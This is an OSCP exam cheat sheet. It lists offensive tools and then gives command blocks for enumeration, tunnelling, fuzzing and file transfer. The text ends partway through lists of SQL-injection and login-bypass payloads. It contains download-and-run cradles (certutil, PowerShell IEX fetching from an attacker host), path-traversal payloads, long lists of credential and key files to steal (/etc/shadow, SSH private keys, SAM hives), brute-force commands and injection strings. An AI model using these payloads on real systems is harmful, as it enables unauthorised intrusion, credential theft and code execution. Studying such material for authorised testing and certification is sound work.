OSCP Cheat Sheet
Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.
Basics
Name | URL |
---|---|
Swaks | https://github.com/jetmore/swaks |
CyberChef | https://gchq.github.io/CyberChef/ |
Information Gathering
Name | URL |
---|---|
Nmap | https://github.com/nmap/nmap |
pspy | https://github.com/DominicBreuker/pspy |
enum4linux | https://github.com/CiscoCXSecurity/enum4linux |
BloodHound | https://github.com/BloodHoundAD/BloodHound |
BloodHound Python | https://github.com/fox-it/BloodHound.py |
Vulnerability Analysis
Name | URL |
---|---|
Sparta | https://github.com/SECFORCE/sparta |
nikto | https://github.com/sullo/nikto |
Web Application Analysis
Name | URL |
---|---|
PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |
ysoserial | https://github.com/frohoff/ysoserial |
JSON Web Tokens | https://jwt.io/ |
httpx | https://github.com/projectdiscovery/httpx |
Gobuster | https://github.com/OJ/gobuster |
ffuf | https://github.com/ffuf/ffuf |
Wfuzz | https://github.com/xmendez/wfuzz |
WPScan | https://github.com/wpscanteam/wpscan |
Database Assessment
Name | URL |
---|---|
NoSQLMap | https://github.com/codingo/NoSQLMap |
sqlmap | https://github.com/sqlmapproject/sqlmap |
Password Attacks
Name | URL |
---|---|
Hydra | https://github.com/vanhauser-thc/thc-hydra |
Patator | https://github.com/lanjelot/patator |
Kerbrute | https://github.com/ropnop/kerbrute |
CrackMapExec | https://github.com/byt3bl33d3r/CrackMapExec |
SprayingToolkit | https://github.com/byt3bl33d3r/SprayingToolkit |
John | https://github.com/openwall/john |
hashcat | https://hashcat.net/hashcat |
LaZagne | https://github.com/AlessandroZ/LaZagne |
mimikatz | https://github.com/gentilkiwi/mimikatz |
pypykatz | https://github.com/skelsec/pypykatz |
RsaCtfTool | https://github.com/Ganapati/RsaCtfTool |
Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet |
Reverse Engineering
Exploitation Tools
Name | URL |
---|---|
lsassy | https://github.com/Hackndo/lsassy |
Rubeus | https://github.com/GhostPack/Rubeus |
printspoofer | https://github.com/dievus/printspoofer |
pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit |
Evil-WinRM | https://github.com/Hackplayers/evil-winrm |
Metasploit | https://github.com/rapid7/metasploit-framework |
SharpCollection | https://github.com/Flangvik/SharpCollection |
PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack |
Post Exploitation
Name | URL |
---|---|
PEASS-ng | https://github.com/carlospolop/PEASS-ng |
LinEnum | https://github.com/rebootuser/LinEnum |
JAWS | https://github.com/411Hall/JAWS |
Watson | https://github.com/rasta-mouse/Watson |
WESNG | https://github.com/bitsadmin/wesng |
Sherlock | https://github.com/rasta-mouse/Sherlock |
scavenger | https://github.com/SpiderLabs/scavenger |
GTFOBins | https://gtfobins.github.io/ |
LOLBAS | https://lolbas-project.github.io/ |
Impacket | https://github.com/SecureAuthCorp/impacket |
powercat | https://github.com/besimorhino/powercat |
PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 |
Windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check |
Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation |
Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html |
Priv2Admin | https://github.com/gtworek/Priv2Admin |
CVEs
Exploiting
Name | URL |
---|---|
PwnTools | https://github.com/Gallopsled/pwntools |
checksec | https://github.com/slimm609/checksec.sh |
mona | https://github.com/corelan/mona |
Ropper | https://github.com/sashs/Ropper |
Buffer Overflow | https://github.com/gh0x0st/Buffer_Overflow |
Payloads
Name | URL |
---|---|
PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |
Payload Box | https://github.com/payloadbox |
ysoserial | https://github.com/frohoff/ysoserial |
nishang | https://github.com/samratashok/nishang |
Shikata Ga Nai | https://github.com/EgeBalci/sgn |
unicorn | https://github.com/trustedsec/unicorn |
PowerLine | https://github.com/fullmetalcache/powerline |
woodpecker | https://github.com/woodpecker-appstore/log4j-payload-generator |
marshalsec | https://github.com/mbechler/marshalsec |
AMSI.fail | http://amsi.fail |
Raikia’s Hub | https://raikia.com/tool-powershell-encoder/ |
Web-Shells | https://github.com/TheBinitGhimire/Web-Shells |
PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell |
Wordlists
Name | URL |
---|---|
SecLists | https://github.com/danielmiessler/SecLists |
CeWL | https://github.com/digininja/cewl |
CUPP | https://github.com/Mebus/cupp |
COOK | https://github.com/giteshnxtlvl/cook |
Social Media Resources
Name | URL |
---|---|
IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA |
IppSec.rocks | https://ippsec.rocks/?# |
0xdf | https://0xdf.gitlab.io/ |
HackTricks | https://book.hacktricks.xyz/ |
Hacking Articles | https://www.hackingarticles.in/ |
Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ |
Commands
Basics
CentOS
```
doas -u <USERNAME> /bin/sh
```
Certutil
```
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>
```
Chisel
```
./chisel server -p 9002 -reverse -v
./chisel client <RHOST>:9002 R:9003:127.0.0.1:8888
```
gcc
```
gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit
i686-w64-mingw32-gcc -o main32.exe main.c
x86_64-w64-mingw32-gcc -o main64.exe main.c
```
Netcat
```
nc -lnvp <LPORT> < <FILE>
nc <RHOST> <RPORT> > <FILE>
```
PHP Webserver
```
sudo php -S 127.0.0.1:80
```
Ping
```
ping -c 1 <RHOST>
ping -n 1 <RHOST>
```
Python Webserver
```
sudo python -m SimpleHTTPServer 80
sudo python3 -m http.server 80
```
RDP
```
xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> +clipboard
rdesktop <RHOST>
```
SSH
```
ssh user@<RHOST> -oKexAlgorithms=+diffie-hellman-group1-sha1
ssh -R 8080:<LHOST>:80 <RHOST>
ssh -L 8000:127.0.0.1:8000 <USERNAME>@<RHOST>
ssh -N -L 1234:127.0.0.1:1234 <USERNAME>@<RHOST>
ssh -L 80:<LHOST>:80 <RHOST>
ssh -L 127.0.0.1:80:<LHOST>:80 <RHOST>
ssh -L 80:localhost:80 <RHOST>
```
tmux
```
ctrl b + w          # show windows
ctrl + "            # split window horizontal
ctrl + %            # split window vertical
ctrl + ,            # rename window
ctrl + {            # flip window
ctrl + }            # flip window
ctrl + spacebar     # switch pane layout
```
Copy & Paste
```
:setw -g mode-keys vi
```
1. ctrl b + [
2. space
3. enter
4. ctrl b + ]
Search
```
ctrl b + [      # enter copy mode
ctrl + /        # enter search while within copy mode (vi mode)
n               # search next
shift + n       # reverse search
```
Upgrading Shells
```
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo
fg
Enter
Enter
export TERM=xterm
```
vi
```
:w !sudo tee %    # save file with elevated privileges without exiting
```
Windows Command Formatting
```
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
```
Information Gathering
Nmap
```
sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <RHOST>    # discovery scan
sudo nmap -A -T4 -sC -sV --script vuln <RHOST>                         # vulnerability scan
sudo nmap -sU <RHOST>                                                  # udp scan
sudo nmap -sC -sV -p- --scan-delay 5s <RHOST>                          # delayed scan
sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <RHOST>    # kerberos enumeration
ls -lh /usr/share/nmap/scripts/*ssh*
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
```
DNS
Reverse DNS
```
whois <RHOST>
host <RHOST> <RHOST>
host -l <RHOST> <RHOST>
dig @<RHOST> -x <RHOST>
dig {a|txt|ns|mx} <RHOST>
dig {a|txt|ns|mx} <RHOST> @ns1.<RHOST>
dig axfr @<RHOST> <RHOST>    # zone transfer
```
ldapsearch
```
ldapsearch -x -w <PASSWORD>
ldapsearch -x -h <RHOST> -s base namingcontexts
ldapsearch -x -b "dc=<RHOST>,dc=local" "*" -h <RHOST> | awk '/dn: / {print $2}'
ldapsearch -x -D "cn=admin,dc=<RHOST>,dc=local" -s sub "cn=*" -h <RHOST> | awk '/uid: /{print $2}' | nl
ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
ldapsearch -x -h <RHOST> -D "<USERNAME>" -b "dc=<RHOST>,dc=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
```
sslyze
```
sslyze --heartbleed <RHOST>
```
SMB / NetBIOS
```
nbtscan <RHOST>
enum4linux -a <RHOST>
```
JAWS
```
IEX(New-Object Net.webclient).downloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1')
```
Vulnerability Analysis
finger
```
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t <RHOST>
```
Web Application Analysis
Asset Discovery
```
curl -s -k "https://jldc.me/anubis/subdomains/example.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d'
```
ffuf
```
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ -mc 200,204,301,302,307,401 -o results.txt
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<RHOST>/ -H "Host: FUZZ.<RHOST>" -fs 185
ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<RHOST>/backups/backup_2020070416FUZZ.zip
```
API Fuzzing
```
ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412
```
Looking for LFI
```
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349
```
Fuzzing with PHP Session ID
```
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http://<RHOST>/admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644
```
Recursion
```
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/basic/FUZZ -recursion
```
File Extensions
```
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/ext/logs/FUZZ -e .log
```
No 404 Header
```
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/no404/FUZZ -fs 669
```
Param Mining
```
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/param/data?FUZZ=1
```
Rate Limiting
```
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://<RHOST>/cd/rate/FUZZ -mc 200,429
```
IDOR Testing
```
seq 1 1000 | ffuf -w - -u http://<RHOST>/cd/pipes/user?id=FUZZ
```
Script for IDOR Testing
```bash
#!/bin/bash
# hashit: read one value per line from stdin and emit it md5-hashed,
# base64-encoded, or unchanged, depending on the first argument.
while read -r i; do
  if [ "$1" == "md5" ]; then
    echo -n "$i" | md5sum | awk '{ print $1 }'
  elif [ "$1" == "b64" ]; then
    echo -n "$i" | base64
  else
    echo "$i"
  fi
done
```
Use the script above for Base64 encoding
```
seq 1 1000 | /usr/local/bin/hashit b64 | ffuf -w - -u http://<RHOST>/cd/pipes/user2?id=FUZZ
```
MD5 Discovery using the Script
```
seq 1 1000 | /usr/local/bin/hashit md5 | ffuf -w - -u http://<RHOST>/cd/pipes/user3?id=FUZZ
```
Virtual Host Discovery
```
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -fs 1495
```
Massive File Extension Discovery
```
ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip
```
Gobuster
```
-e          // extended mode that renders the full url
-k          // skip ssl certificate validation
-r          // follow redirects
-s          // status codes
-b          // exclude status codes
--wildcard  // set wildcard option

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>/ -x php
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<RHOST>/ -x php,txt,html,js -e -s 200
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://<RHOST>:<RPORT>/ -b 200 -k --wildcard
```
Common File Extensions
txt,bak,php,html,js,asp,aspx
Common Picture Extensions
png,jpg,jpeg,gif,bmp
POST Requests
```
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://<RHOST>/api/ -e -s 200
```
DNS Recon
```
gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
```
VHost Discovery
```
gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
```
Specify User Agent
```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/ -a Linux
```
Local File Inclusion (LFI)
```
http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>.php?file=../../../../../../../../../../etc/passwd
```
Up to PHP 5.3 (null byte terminates the path)
```
http://<RHOST>/<FILE>.php?file=../../../../../../../../../../etc/passwd%00
```
Encoded Traversal Strings
```
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
```
Base64 Execution Bypass
```
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
base64 -d <FILE>.php
```
Linux Files
```
/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/<PID>/cmdline
/proc/<PID>/maps
/proc/stat
/proc/swaps
/proc/version
/proc/self/net/arp
/proc/self/cwd/app.py
/proc/sched_debug
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/<vhost>/__init__.py
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
```
Windows Files
```
C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
```
wfuzz
```
wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://<RHOST>/FUZZ/<FILE>.php --hc '403,404'
```
Write to File
```
wfuzz -w /PATH/TO/WORDLIST -c -f <FILE> -u http://<RHOST> --hc 403,404
```
Custom Scan with limited Output
```
wfuzz -w /PATH/TO/WORDLIST -u http://<RHOST>/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20
```
Fuzzing two Parameters at once
```
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
```
Domain
```
wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.<RHOST>.<tld>' -u http://<RHOST>/
```
Subdomain
```
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<RHOST>" --hc 200 --hw 356 -t 100 <RHOST>
```
Git
```
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://<RHOST>/FUZZ --hc 403,404
```
Login
```
wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "email=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --hc 200 -c
wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "username=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --ss "Invalid login"
```
SQL
```
wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://<RHOST>/select http
```
DNS
```
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ.<RHOST>" --filter "r.headers.response~'Access-Control-Allow-Origin'" http://<RHOST>/
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -t 100
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> --hw <value> -t 100
```
Numbering Files
```
wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip
```
Enumerating PIDs
```
wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000
```
WPScan
```
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u
target=<RHOST>; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50
```
Database Analysis
Basic Commands
```
mysql -u <USERNAME> -h <RHOST> -p
```
```sql
show databases;
use <DATABASE>;
show tables;
SELECT * FROM <TABLE>;
```
SQL Injection
Master List
```
admin' or '1'='1
' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 -
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-
```
Authentication Bypass
```
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
